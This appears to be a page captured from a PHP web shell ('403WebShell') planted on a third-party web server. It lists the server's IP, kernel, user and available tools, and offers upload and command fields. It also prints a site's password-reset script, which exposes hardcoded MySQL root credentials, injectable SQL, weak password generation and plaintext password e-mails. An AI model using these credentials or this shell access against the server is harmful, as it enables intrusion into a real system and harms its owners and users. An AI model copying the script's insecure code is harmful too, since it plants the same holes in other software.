????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 18.217.162.18
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/evacuationplans.astacus.se/scripts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/evacuationplans.astacus.se/scripts/newpassword.php
<?php

function generatePassword($length=9, $strength=0) {
	$vowels = 'aeuy';
	$consonants = 'bdghjmnpqrstvz';
	if ($strength & 1) {
		$consonants .= 'BDGHJLMNPQRSTVWXZ';
	}
	if ($strength & 2) {
		$vowels .= "AEUY";
	}
	if ($strength & 4) {
		$consonants .= '23456789';
	}
	if ($strength & 8) {
		$consonants .= '@#$%';
	}
 
	$password = '';
	$alt = time() % 2;
	for ($i = 0; $i < $length; $i++) {
		if ($alt == 1) {
			$password .= $consonants[(rand() % strlen($consonants))];
			$alt = 0;
		} else {
			$password .= $vowels[(rand() % strlen($vowels))];
			$alt = 1;
		}
	}
	return $password;
}
 
 

session_start();
session_regenerate_id();
		
$username = $_POST['username'];

$username = stripslashes($username);
$username = mysql_real_escape_string($username);

$link = mysql_connect ("localhost", "root", "root123");
mysql_select_db ("vpa");
						
			$mailtext = "Hello, we have genereated the following password:<br><br>";			
			$sql = "Select * from SystemUser where Username = '".$username."'";
			$result = mysql_query($sql);
			
			$posid = 0;
			while ($row = mysql_fetch_assoc($result)){ 
				
				$password_text = generatePassword(9,8);
				$password = base64_encode(sha1($password_text,TRUE));

				
				$mailtext .= "Username: ".$row['Username']."<br>";
				$mailtext .= "Password: ".$password_text."<br><br>";
				
				$sql = "Update SystemUser set Password = '".$password."' where SystemUserId = ".$row['SystemUserId'];
				
				mysql_query($sql);
				$posid++;
			}
			if($posid != 0){
$headers  = 'MIME-Version: 1.0' . "\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n"; 
$headers .= "From: noreply@astacus.se\r\n";

mail($username, "Evacuation Plans - New Password", $mailtext."<br><br>Best regards, Evacuation Plans team", $headers);	

                if($_GET['page'] == "mobile"){
                     header("Location: https://evacuationplans.astacus.se/login/mobile/index.php?msg=A new password was sent to your e-mail!");
                }else{
                    header("Location: https://evacuationplans.astacus.se/loggain.php?msg=A new password was sent to your e-mail!");
                }

}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit